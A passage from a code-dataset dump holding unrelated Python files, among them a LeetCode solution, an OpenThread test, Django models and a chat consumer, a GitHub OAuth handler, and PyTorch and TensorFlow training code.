'testtweetfile.dat'\n tweetCount = RetrieveTweets(searchQuery,storagefile,maxtweets)\n maxtweets = tweetCount\n #import shutil\n #shutil.copy(storagefile,type+'tweets.dat')\n \n testpickle = open('testtweetfile.dat','rb')\n testtweets = pickle.load(testpickle)\n testpickle.close()\n testfilename = username+'test_tweets.csv'\n columns=['text','mentions','choose_one','class_label']\n testframe = pd.DataFrame(columns=columns,index=range(len(testtweets)))\n i = 0\n \n for tweet in testtweets:\n tweettext = tweet['full_text']\n testframe.at[i,'text']=tweettext\n testframe.at[i,'mentions'] = tweet['entities']['user_mentions']\n testframe.at[i,'choose_one']=''\n testframe.at[i,'class_label']=2\n i+=1\n \n testframe.to_csv(testfilename)\n return testfilename","sub_path":"squeakywheel/gettesttweets.py","file_name":"gettesttweets.py","file_ext":"py","file_size_in_byte":3750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"358838017","text":"# 115. 
不同的子序列\n# 给定一个字符串 s 和一个字符串 t ,计算在 s 的子序列中 t 出现的个数。\n# 字符串的一个 子序列 是指,通过删除一些(也可以不删除)字符且不干扰剩余字符相对位置所组成的新字符串。(例如,\"ACE\"是\"ABCDE\"的一个子序列,而\"AEC\"不是)\n# 题目数据保证答案符合 32 位带符号整数范围\n# 来源:力扣(LeetCode)\n# 链接:https://leetcode-cn.com/problems/distinct-subsequences\n# 示例1:\n# 输入:s = \"rabbbit\", t = \"rabbit\"\n# 输出:3\n# 解释:\n# 如下图所示, 有 3 种可以从 s 中得到 \"rabbit\" 的方案。\n# (上箭头符号 ^ 表示选取的字母)\n# rabbbit\n# ^^^^ ^^\n# rabbbit\n# ^^ ^^^^\n# rabbbit\n# ^^^ ^^^\nclass Solution:\n def numDistinct(self, s: str, t: str) -> int:\n # 1 t 是 s 的子序列 t的长度小于s的长度\n # 动态规划\n # t[i] == s[j] dp[i][j] = dp[i+1][j+1] + dp[i+1][j]\n # t[i] != s[j] dp[i][j] = dp[i+1][j]\n m, n = len(s), len(t)\n if m < n:\n return 0\n dp = [[0] * (n + 1) for _ in range(m + 1)]\n # 当 j = n 时, t[j:]为空字符串,是任何子字符串的子序列,因此dp[i][n] = 1\n for i in range(m + 1):\n dp[i][n] = 1\n for i in range(m - 1, -1, -1):\n for j in range(n - 1, -1, -1):\n if s[i] == t[j]:\n dp[i][j] = dp[i + 1][j + 1] + dp[i + 1][j]\n else:\n dp[i][j] = dp[i + 1][j]\n return dp[0][0]\n","sub_path":"Hard/numDistinct.py","file_name":"numDistinct.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"527950590","text":"#!/usr/bin/env python3\n#\n# Copyright (c) 2021, The OpenThread Authors.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# 3. Neither the name of the copyright holder nor the\n# names of its contributors may be used to endorse or promote products\n# derived from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n#\n\nimport unittest\n\nimport config\nimport thread_cert\n\nLEADER = 1\nROUTER = 2\nMED = 3\nSED = 4\n\n\nclass TestDatasetUpdater(thread_cert.TestCase):\n SUPPORT_NCP = False\n USE_MESSAGE_FACTORY = False\n\n TOPOLOGY = {\n LEADER: {\n 'mode': 'rdn',\n 'channel': 11,\n },\n ROUTER: {\n 'mode': 'rdn',\n 'channel': 11,\n },\n MED: {\n 'mode': 'rn',\n 'channel': 11,\n 'allowlist': [ROUTER],\n },\n SED: {\n 'mode': '-',\n 'channel': 11,\n 'timeout': config.DEFAULT_CHILD_TIMEOUT,\n 'allowlist': [ROUTER],\n },\n }\n\n def test(self):\n self.nodes[LEADER].start()\n self.simulator.go(config.LEADER_STARTUP_DELAY)\n self.assertEqual(self.nodes[LEADER].get_state(), 'leader')\n\n self.nodes[ROUTER].start()\n self.simulator.go(config.ROUTER_STARTUP_DELAY)\n self.assertEqual(self.nodes[ROUTER].get_state(), 'router')\n\n self.nodes[MED].start()\n self.simulator.go(5)\n self.assertEqual(self.nodes[MED].get_state(), 'child')\n\n self.nodes[SED].start()\n self.simulator.go(5)\n self.assertEqual(self.nodes[SED].get_state(), 'child')\n\n self.verify_state(11)\n\n # update initiated by LEADER\n self.nodes[LEADER].start_dataset_updater(channel=12)\n self.simulator.go(120)\n self.verify_state(12)\n\n # update initiated by ROUTER\n self.nodes[ROUTER].start_dataset_updater(channel=13)\n self.simulator.go(120)\n self.verify_state(13)\n\n # update initiated by LEADER overridden by ROUTER\n self.nodes[LEADER].start_dataset_updater(channel=14)\n self.simulator.go(20)\n self.nodes[ROUTER].start_dataset_updater(channel=15)\n self.simulator.go(120)\n self.verify_state(15)\n\n # update initiated by ROUTER overridden by LEADER\n self.nodes[ROUTER].start_dataset_updater(channel=16)\n self.simulator.go(10)\n self.nodes[LEADER].start_dataset_updater(channel=17)\n self.simulator.go(120)\n self.verify_state(17)\n\n def verify_state(self, channel):\n self.assertEqual(self.nodes[LEADER].get_channel(), channel)\n self.assertEqual(self.nodes[ROUTER].get_channel(), channel)\n self.assertEqual(self.nodes[MED].get_channel(), channel)\n self.assertEqual(self.nodes[SED].get_channel(), channel)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/scripts/thread-cert/test_dataset_updater.py","file_name":"test_dataset_updater.py","file_ext":"py","file_size_in_byte":4104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"351414849","text":"import math\n\nfrom autoslug import AutoSlugField\nfrom ckeditor.fields import RichTextField\nfrom django.contrib.auth.models import User\nfrom django.db import models\n\n# Create your models here.\nfrom django.db.models import Avg\nfrom sorl.thumbnail import ImageField\n\n\nclass Category(models.Model):\n title = models.CharField(max_length=255)\n details = RichTextField()\n slug = AutoSlugField(populate_from='title', unique=True)\n\n class Meta:\n verbose_name_plural = 'Categories'\n\n def __str__(self):\n return self.title\n\n\nclass Product(models.Model):\n title = models.CharField(max_length=255)\n 
category = models.ForeignKey(Category, on_delete=models.CASCADE)\n slug = AutoSlugField(populate_from='title', unique=True)\n price = models.IntegerField()\n discount = models.IntegerField()\n availability = models.BooleanField()\n brand = models.CharField(max_length=50)\n size = models.CharField(max_length=255)\n colors = models.CharField(max_length=255)\n short_intro = RichTextField()\n details = RichTextField()\n pubdate = models.DateTimeField(auto_now_add=True)\n deals_of_the_day = models.BooleanField()\n is_new = models.BooleanField()\n\n def image(self):\n return self.producthasimage_set.first().image\n\n def size_list(self):\n if not self.size:\n return []\n return self.size.split(',')\n\n def __str__(self):\n return self.title\n\n def rating(self):\n op = self.producthasimage_set.aggregate(Avg('rating'))\n r = 0\n if 'rating__avg' in op and op['rating_avg']:\n r = op['rating_avg']\n\n return int(math.ceil(r))\n\n def rating_range(self):\n return range(self.rating())\n\n\nclass ProductHasImage(models.Model):\n image = ImageField()\n caption = models.TextField()\n product = models.ForeignKey(Product, on_delete=models.CASCADE)\n\n\nclass ProductHasReview(models.Model):\n user = models.ForeignKey(User, on_delete=models.DO_NOTHING)\n product = models.ForeignKey(Product, on_delete=models.CASCADE)\n rating = models.IntegerField()\n comment = models.TextField()\n pubdate = models.DateTimeField(auto_now_add=True)\n\n def rating_range(self):\n if not self.rating:\n return []\n\n return range(self.rating)\n","sub_path":"Onlinebazzar/shop/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"532354072","text":"import json\nimport os\nfrom flask import redirect, request, session\nfrom flask_restplus import Namespace, Resource\nfrom requests_oauthlib import OAuth2Session\nfrom security.token import get_jwt_token, TokenType, get_token_redirect_response\n\n# pylint: disable=unused-variable\n\n# OAuth endpoints given in the GitHub API documentation\nAUTHORIZATION_URI = 'https://github.com/login/oauth/authorize'\nTOKEN_URI = 'https://github.com/login/oauth/access_token'\nUSER_PROFILE_URI = 'https://api.github.com/user'\nUSER_EMAIL_URI = 'https://api.github.com/user/emails'\nSCOPE = ['user:email']\n\n# OAuth application configuration created on Github\nclient_id = os.environ['GITHUB_CLIENT_ID']\nclient_secret = os.environ['GITHUB_CLIENT_SECRET']\nredirect_uri = os.environ['HOST_NAME'] + '/mobydq/api/v1/security/oauth/github/callback'\n\n\ndef get_user_info(github_session: object):\n \"\"\"Gets user profile using OAuth session.\"\"\"\n\n user_profile = github_session.get(USER_PROFILE_URI).content.decode('utf-8')\n user_profile = json.loads(user_profile)\n\n if user_profile['email'] is None:\n emails = github_session.get(USER_EMAIL_URI).content.decode('utf-8')\n emails = json.loads(emails)\n user_profile['email'] = emails[0]['email']\n\n return user_profile\n\n\ndef register_github_oauth(namespace: Namespace):\n \"\"\"Registers all endpoints used for Github OAuth authentication.\"\"\"\n\n @namespace.route('/security/oauth/github')\n @namespace.doc()\n class GithubOAuth(Resource):\n \"\"\"Defines resource to redirect user to Github OAuth page.\"\"\"\n\n def get(self):\n \"\"\"Redirects user to Github OAuth page.\"\"\"\n\n github_session = OAuth2Session(client_id, redirect_uri=redirect_uri, scope=SCOPE)\n url, state = github_session.authorization_url(AUTHORIZATION_URI)\n\n # 
State is used to prevent CSRF, keep this for later.\n session['oauth_state'] = state\n return redirect(url)\n\n @namespace.route('/security/oauth/github/callback')\n @namespace.doc()\n class GithubOAuthCallback(Resource):\n \"\"\"Defines resource to handle callback from Github OAuth.\"\"\"\n\n def get(self):\n \"\"\"Handles Github OAuth callback and fetch user access token.\"\"\"\n\n github_session = OAuth2Session(client_id, state=session['oauth_state'])\n token = github_session.fetch_token(TOKEN_URI, client_secret=client_secret, authorization_response=request.url)\n\n user_info = get_user_info(github_session)\n jwt = get_jwt_token(TokenType.GITHUB, user_info['email'], user_info, token)\n return get_token_redirect_response(jwt)\n","sub_path":"api/init/security/oauth/github.py","file_name":"github.py","file_ext":"py","file_size_in_byte":2641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"149806448","text":"import os\nimport tensorflow as tf\n\nfrom badgr.file_manager import FileManager\nfrom badgr.datasets.tfrecord_rebalance_dataset import TfrecordRebalanceDataset\nfrom badgr.jackal.envs.jackal_env_specs import JackalPositionCollisionEnvSpec\nfrom badgr.jackal.models.jackal_position_model import JackalPositionModel\nfrom badgr.utils.python_utils import AttrDict as d\n\n\n\n###############\n### Dataset ###\n###############\n\ndef get_dataset_params(env_spec, horizon, batch_size):\n all_tfrecord_folders = [\n os.path.join(FileManager.data_dir, 'tfrecords_collision/{0}-2019_horizon_{1}'.format(f, horizon)) for f in\n ['08-02', '08-06', '08-08', '08-13', '08-15', '08-18', '08-20', '08-27', '08-29', '09-09', '09-12', '09-17',\n '09-19', '10-20', '10-24', '10-31']\n ]\n train_tfrecord_folders = [fname for fname in all_tfrecord_folders if '09-12' not in fname],\n holdout_tfrecord_folders = [fname for fname in all_tfrecord_folders if '09-12' in fname],\n\n kwargs_train = d(\n rebalance_key='outputs/collision/close',\n\n env_spec=env_spec,\n tfrecord_folders=train_tfrecord_folders,\n\n horizon=horizon,\n batch_size=batch_size,\n\n num_parallel_calls=6,\n shuffle_buffer_size=1000,\n prefetch_buffer_size_multiplier=10,\n )\n\n kwargs_holdout = kwargs_train.copy()\n kwargs_holdout.tfrecord_folders = holdout_tfrecord_folders\n\n return d(\n cls=TfrecordRebalanceDataset,\n kwargs_train=kwargs_train,\n kwargs_holdout=kwargs_holdout\n\n )\n\n\n#############\n### Model ###\n#############\n\ndef get_model_params(env_spec, horizon):\n kwargs_train = d(\n # jackal mode\n use_both_images=False,\n\n # RNN\n horizon=horizon,\n rnn_dim=64,\n\n # inputs/outputs\n env_spec=env_spec,\n output_observations=[\n d(\n name='jackal/position',\n is_relative=True\n ),\n d(\n name='collision/close',\n is_relative=False\n )\n ],\n\n is_output_gps=False,\n )\n\n kwargs_eval = kwargs_train.copy()\n kwargs_eval.is_output_gps = True\n\n return d(\n cls=JackalPositionModel,\n kwargs_train=kwargs_train,\n kwargs_eval=kwargs_eval\n )\n\n\n################\n### Training ###\n################\n\ndef get_trainer_params():\n\n def cost_fn(model_outputs, outputs):\n batch_size = tf.shape(outputs.done)[0]\n batch_size_float = tf.cast(batch_size, tf.float32)\n\n done = tf.concat([tf.zeros([batch_size, 1], dtype=tf.bool), outputs.done[:, :-1]], axis=1)\n mask = tf.cast(tf.logical_not(done), tf.float32)\n tf.debugging.assert_positive(tf.reduce_sum(mask, axis=1))\n mask = batch_size_float * (mask / tf.reduce_sum(mask))\n mask = mask[..., tf.newaxis]\n\n ### position\n\n cost_position = 
tf.reduce_sum(\n mask * 0.5 * tf.square(model_outputs.jackal.position - outputs.jackal.position),\n axis=(1, 2)\n )\n\n ### collision\n\n model_output_collision = model_outputs.collision.close[..., 0]\n\n collision = tf.cast(outputs.collision.close, tf.bool)[..., 0]\n collision = tf.logical_and(collision, tf.logical_not(done)) # don't count collisions after done!\n collision = tf.cumsum(tf.cast(collision, tf.float32), axis=-1) > 0.5\n\n # collision mask should be same as normal mask, but turned on for dones with collision = true\n mask_collision = tf.cast(tf.logical_or(tf.logical_not(done), collision), tf.float32)\n mask_collision = batch_size_float * (mask_collision / tf.reduce_sum(mask_collision))\n\n cost_collision = 2.0 * tf.reduce_sum(\n mask_collision * tf.nn.sigmoid_cross_entropy_with_logits(labels=tf.cast(collision, tf.float32),\n logits=model_output_collision),\n axis=1\n )\n collision_accuracy = tf.reduce_mean(tf.cast(tf.equal(model_output_collision > 0,\n tf.cast(collision, tf.bool)),\n tf.float32),\n axis=1)\n collision_accuracy_random = tf.reduce_mean(1. - tf.cast(collision, tf.float32), axis=1)\n\n ### regularization\n\n cost_l2_reg = 1e-2 * \\\n tf.reduce_mean([0.5 * tf.reduce_mean(kernel * kernel) for kernel in model_outputs.kernels]) * \\\n tf.ones(batch_size)\n\n ### filter out nans\n\n costs_is_finite = tf.logical_and(tf.is_finite(cost_position), tf.is_finite(cost_collision))\n cost_position = tf.boolean_mask(cost_position, costs_is_finite)\n cost_collision = tf.boolean_mask(cost_collision, costs_is_finite)\n cost_l2_reg = tf.boolean_mask(cost_l2_reg, costs_is_finite)\n # assert cost_l2_reg.shape[0].value > 0.5 * batch_size\n\n ### total\n\n cost = cost_position + cost_collision + cost_l2_reg\n\n return d(\n total=cost,\n position=cost_position,\n collision=cost_collision,\n collision_accuracy=collision_accuracy,\n collision_accuracy_random=collision_accuracy_random,\n l2_reg=cost_l2_reg\n )\n\n\n return d(\n # steps\n max_steps=2e5,\n holdout_every_n_steps=50,\n log_every_n_steps=1e3,\n save_every_n_steps=1e4,\n\n # dataset\n batch_size=32,\n\n # optimizer\n cost_fn=cost_fn,\n optimizer_cls=tf.compat.v1.train.AdamOptimizer,\n learning_rate=1e-4,\n )\n\n##################\n### Get params ###\n##################\n\ndef get_params():\n horizon = 8\n\n env_spec = JackalPositionCollisionEnvSpec(left_image_only=True)\n\n model_params = get_model_params(env_spec, horizon)\n trainer_params = get_trainer_params()\n dataset_params = get_dataset_params(env_spec, horizon, trainer_params.batch_size)\n\n return d(\n exp_name='collision_position',\n\n dataset=dataset_params,\n model=model_params,\n trainer=trainer_params,\n )\n\nparams = get_params()\n","sub_path":"badgr/data/configs/collision_position.py","file_name":"collision_position.py","file_ext":"py","file_size_in_byte":6250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"404993572","text":"from asgiref.sync import async_to_sync\nimport json\nfrom channels.generic.websocket import WebsocketConsumer\nfrom .models import Message\nfrom restltform.models import follow\nfrom django.contrib.auth import get_user_model\nfrom django.shortcuts import render,redirect,get_object_or_404\nUser=get_user_model()\nclass ChatConsumer(WebsocketConsumer):\n def fetch_messages(self,data):\n #print(\"fetching\",data)\n reciver=data['to'].replace(data['from'],\"\")\n from_user=get_object_or_404(User,username=data['from'])\n reciver_user=get_object_or_404(User,username=reciver)\n 
messages=Message.get_messages(from_user=from_user,to_user=reciver_user)\n #messages=Message.last_10_messages(Message)\n content={\n 'command':'messages',\n 'messages':self.messages_to_json(messages)\n }\n self.send_message(content)\n def new_message(self,data):\n #print(\"new\")\n author=data['from']\n reciver=data['to'].replace(author,\"\")\n reciver_obj=get_object_or_404(User,username=reciver)\n author_user=User.objects.filter(username=author)[0]\n message=Message.objects.create(author=author_user,content=data['message'],reciver=reciver_obj)\n content={\n 'command':'new_message',\n 'message':{'author':message.author.username,'content':message.content,'timestamp':str(message.timestamp)}\n }\n\n return self.send_chat_message(content)\n def messages_to_json(self,messages):\n result=[]\n for msg in messages:\n result.append({'author':msg.author.username,'content':msg.content,'timestamp':str(msg.timestamp)})\n return result\n commands={\n \"fetch_messages\":fetch_messages,\n \"new_message\":new_message\n }\n def connect(self):\n self.room_name = self.scope['url_route']['kwargs']['room_name']\n self.room_group_name = 'chat_%s' % self.room_name\n user=self.scope['user']\n #print(user.profile_user.status)\n _user=get_object_or_404(follow,user=user)\n _user.status=True\n _user.save()\n # Join room group\n async_to_sync(self.channel_layer.group_add)(\n self.room_group_name,\n self.channel_name\n )\n\n self.accept()\n\n def disconnect(self, close_code):\n # Leave room group\n user=self.scope['user']\n _user=get_object_or_404(follow,user=user)\n _user.status=False\n _user.save()\n async_to_sync(self.channel_layer.group_discard)(\n self.room_group_name,\n self.channel_name\n )\n\n # Receive message from WebSocket\n def receive(self, text_data):\n data= json.loads(text_data)\n #print(data)\n self.commands[data['command']](self,data)\n # Send message to room group\n def send_chat_message(self,message):\n async_to_sync(self.channel_layer.group_send)(\n self.room_group_name,\n {\n 'type': 'chat_message',\n 'message': message\n }\n )\n def send_message(self,message):\n self.send(text_data=json.dumps(message))\n # Receive message from room group\n def chat_message(self, event):\n message = event['message']\n\n # Send message to WebSocket\n self.send(text_data=json.dumps(message))","sub_path":"chat/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"247548223","text":"# -*- coding: utf-8 -*-\n# Copyright 2016 Onestein ()\n# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).\n\nfrom openerp import fields, models, api, _\n\n\nclass SaleOrderConfirmWizard(models.TransientModel):\n _name = \"sale.order.confirm.wizard\"\n _description = \"Wizard - Sale Order Confirm\"\n\n @api.multi\n def confirm_sale_orders(self):\n self.ensure_one()\n active_ids = self._context.get('active_ids')\n orders = self.env['sale.order'].browse(active_ids)\n for order in orders:\n order.action_confirm()\n","sub_path":"wizard/sale_order_confirm.py","file_name":"sale_order_confirm.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"281895845","text":"import sys\n\nn, y = map(int, input().split())\nfor i in range(n+1):\n for j in range(n-i+1):\n k = n - i - j\n money = 10000 * i + 5000 * j + 1000 * k\n if y == money:\n print(\"{} {} {}\".format(i, j, k))\n sys.exit()\nprint(-1, -1, 
-1)","sub_path":"python/Web+DB_PressVol115/C_Otoshidama.py","file_name":"C_Otoshidama.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"321951691","text":"import numpy as np\nfrom scipy.misc import imread, imresize\nfrom scipy.io import loadmat\nimport pandas as pd\nimport os\nimport cv2\nimport matplotlib.pyplot as plt\nfrom keras.preprocessing import image\n\n\ndef get_labels(dataset):\n return {0: 'angry', 1: 'disgust', 2: 'fear', 3: 'happy', 4: 'sad', 5: 'surprise', 6: 'neutral'}\n\ndef load_data(self):\n image_size = (48, 48)\n data = pd.read_csv('datasets/fer2013.csv')\n pixels = data['pixels'].tolist()\n width, height = 48, 48\n faces = []\n for pixel_sequence in pixels:\n face = [int(pixel) for pixel in pixel_sequence.split(' ')]\n face = np.asarray(face).reshape(width, height)\n face = cv2.resize(face.astype('uint8'), self.image_size)\n faces.append(face.astype('float32'))\n faces = np.asarray(faces)\n faces = np.expand_dims(faces, -1)\n emotions = pd.get_dummies(data['emotion']).as_matrix()\n return faces, emotions\n\n\n\n\n\ndef detect_faces(detection_model, gray_image_array):\n return detection_model.detectMultiScale(gray_image_array, 1.3, 5)\n\n\ndef draw_text(coordinates, image_array, text, color, x_offset=0, y_offset=0, font_scale=2, thickness=2):\n x, y = coordinates[:2]\n cv2.putText(image_array, text, (x + x_offset, y + y_offset),\n cv2.FONT_HERSHEY_SIMPLEX,\n font_scale, color, thickness, cv2.LINE_AA)\n\n\ndef draw_bounding_box(face_coordinates, image_array, color):\n x, y, w, h = face_coordinates\n cv2.rectangle(image_array, (x, y), (x + w, y + h), color, 2)\n\n\ndef apply_offsets(face_coords, offsets):\n x, y, width, height = face_coords\n x_off, y_off = offsets\n return (x - x_off, x + width + x_off, y - y_off, y + height + y_off)\n\ndef load_detection_model(model_path):\n detection_model = cv2.CascadeClassifier(model_path)\n return detection_model\n\ndef preprocess_input(x, v2=True):\n x = x.astype('float32')\n x = x / 255.0\n if v2:\n x = x - 0.5\n x = x * 2.0\n return x\n\n\n# def _imread(image_name):\n# return imread(image_name)\n\n\n# def _imresize(image_array, size):\n# return imresize(image_array, size)\n\n\n# def to_categorical(integer_classes, num_classes=2):\n# integer_classes = np.asarray(integer_classes, dtype='int')\n# num_samples = integer_classes.shape[0]\n# categorical = np.zeros((num_samples, num_classes))\n# categorical[np.arange(num_samples), integer_classes] = 1\n# return categorical\n","sub_path":"stream_app/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"333088073","text":"\"\"\"\nDeep neural network for calcium imaging segmentation\nJonathan D. Kenny, July 6th 2018\nCaltech\n\nPyTorch 0.4.0\nPython 3.6\n\"\"\"\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass ConvBlock(nn.Module):\n \"\"\"\n Three convolutional layers with one convolutional residual connection.\n input: (N, in_channels, h, w)\n output: (N, out_channels, h/2, w/2)\n\n Attributes:\n in_channels (int): Number of activation filters/channels for the input.\n out_channels (int): Number of activation filters for the output.\n kernel_size (tuple): Size of the receptive field (in pixels). Inherited from superclass.\n dropout (float): Probability to randomly zero a unit/filter. 
Inherited from superclass.\n\n Diagram:\n /---------------------------> conv -> relu -> drop ---------------------------\\\n inputs -> conv -> relu -> drop -> conv -> relu -> drop -> conv -> relu -> drop -> mp -> output\n \"\"\"\n def __init__(self, in_channels, out_channels, kernel_size, dropout):\n super().__init__()\n\n padding = ((kernel_size[0] - 1)/2, (kernel_size[1] - 1)/2)\n\n # Convolutional Layer 1\n self.conv_1 = nn.Conv2d(in_channels, out_channels, kernel_size=kernel_size, padding=padding)\n self.d_1 = nn.Dropout2d(p=dropout)\n\n # Convolutional Layer 2\n self.conv_2 = nn.Conv2d(out_channels, out_channels, kernel_size=kernel_size, padding=padding)\n self.d_2 = nn.Dropout2d(p=dropout)\n\n # Convolutional Layer 3\n self.conv_3 = nn.Conv2d(out_channels, out_channels, kernel_size=kernel_size, padding=padding)\n self.d_3 = nn.Dropout2d(p=dropout)\n\n # Residual Layer (Skip connection)\n self.conv_4 = nn.Conv2d(in_channels, out_channels, kernel_size=kernel_size, padding=padding)\n self.d_4 = nn.Dropout2d(p=dropout)\n\n # Pooling Layer\n self.mp = nn.MaxPool2d((2, 2), stride=(2, 2))\n\n def forward(self, inputs):\n # Residual Layer (Skip connection)\n residuals = self.d_4(F.relu(self.conv_4(inputs)))\n\n # Convolutional Layer 1\n inputs = self.d_1(F.relu(self.conv_1(inputs)))\n\n # Convolutional Layer 2\n inputs = self.d_2(F.relu(self.conv_2(inputs)))\n\n # Convolutional Layer 3\n inputs = self.d_3(F.relu(self.conv_3(inputs)))\n\n # Skip connection addition\n inputs = inputs + residuals\n\n # Pooling\n inputs = self.mp(inputs)\n\n return inputs\n\n\nclass DeepCalcium(nn.Module):\n \"\"\"\n Convolutional blocks with one fully-connected hidden layer and fully-connected output layer.\n input: (N, 1, h, w)\n output: (h*w)\n\n Attributes:\n filters (list): List of activation fitlers for the convolutional blocks. The length of the list is the number\n of convolutional blocks.\n unit (int): Hidden units in the fully-connected layer.\n h (int): Height of the input image (in pixels, should be a power of 2).\n w (int): Width of the input image (in pixels, should be a power of 2).\n kernel_size (tuple): Size of the receptive field (in pixels).\n dropout (float): Probability to randomly zero a unit/filter.\n\n Diagram:\n inputs -> ...conv blocks... 
-> fc1 -> relu -> dropout -> fc2 -> outputs\n \"\"\"\n def __init__(self, filters, units, h, w, kernel_size=(7, 7), dropout=0.0):\n super().__init__()\n\n # Convolutional layers\n self.blocks = nn.ModuleList()\n for n, _ in enumerate(filters):\n if n is 0:\n self.blocks.append(ConvBlock(1, filters[n], kernel_size=kernel_size, dropout=dropout))\n else:\n self.blocks.append(ConvBlock(filters[n-1], filters[n], kernel_size=kernel_size, dropout=dropout))\n\n # Full-connected layers\n self.fc_1 = nn.Linear((h/(2**len(filters))) * (w/(2**len(filters))) * filters[-1], units)\n self.fc_d = nn.Dropout(p=dropout)\n\n # Output layers\n self.fc_2 = nn.Linear(units, h * w) # cell center (-1 or 1)\n self.fc_3 = nn.Linear(units, h * w) # radius (positive int)\n\n def forward(self, inputs):\n # Convolutional layers\n for _, b in enumerate(self.blocks):\n inputs = b(inputs)\n\n # Reshape and pass to hidden fully-connected layer\n inputs = inputs.view(inputs.shape[0], -1)\n inputs = self.fc_d(F.relu(self.fc_1(inputs)))\n\n # Output layers\n output_1 = F.tanh(self.fc_2(inputs)) # clamp between -1 and 1\n output_2 = F.relu(self.fc_3(inputs)) # keep positive\n\n return output_1, output_2\n\n\n# ======================================================================================================================\n# Options\n# ======================================================================================================================\nfilters = [16, 32, 48, 64]\nunits = 512\nh = 32\nw = 32\nN = 1 # batch size\nn_iterations = 100\nn_cells = 500\n\n# ======================================================================================================================\n# Model training\n# ======================================================================================================================\n# Create learning model\nmodel = DeepCalcium(filters=filters, units=units, h=h, w=w)\n\n# Synthetic images\ninputs = torch.randint(0, 256, (N, 1, h, w)) # pixels (0 to 255)\n\n# Synthetic cell (center) placements (binary: -1 or 1)\ntarget_1 = -1*torch.ones(N, h*w)\nk = torch.randperm(h*w)\ntarget_1[:, k[0:n_cells]] = 1\n\n# Synthetic cell radii (in pixels)\ntarget_2 = torch.zeros(N, h * w)\ntarget_2[:, k[0:n_cells]] = torch.randint(1, 8, (1, n_cells))\n\nif torch.cuda.is_available():\n model = model.cuda()\n inputs = inputs.cuda()\n target_1 = target_1.cuda()\n target_2 = target_2.cuda()\n\n# Create loss function and optimizer\nloss_function_1 = nn.SoftMarginLoss() # cell center (-1 or 1)\nloss_function_2 = nn.MSELoss() # radius (positive int)\noptimizer = torch.optim.Adam(model.parameters(), amsgrad=True)\n\nfor iteration in range(n_iterations):\n # Forward step\n optimizer.zero_grad()\n output_1, output_2 = model(inputs)\n\n # Calculate cross-entropy loss\n loss_1 = loss_function_1(output_1, target_1)\n loss_2 = loss_function_2(output_2, target_2)\n\n # Backward step (backpropagation of errors)\n loss_1.backward(retain_graph=True)\n loss_2.backward()\n optimizer.step()\n\n print('iteration:', iteration, 'loss 1:', loss_1.cpu().detach().numpy(), 'loss 2:', loss_2.cpu().detach().numpy())\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"529370283","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 13 23:38:40 2012\n\n@author: mag\n\"\"\"\n\n#import pickle\n\nimport cPickle as pickle\n\noutput = open('data.pkl', 'wb')\n\n# Pickle 
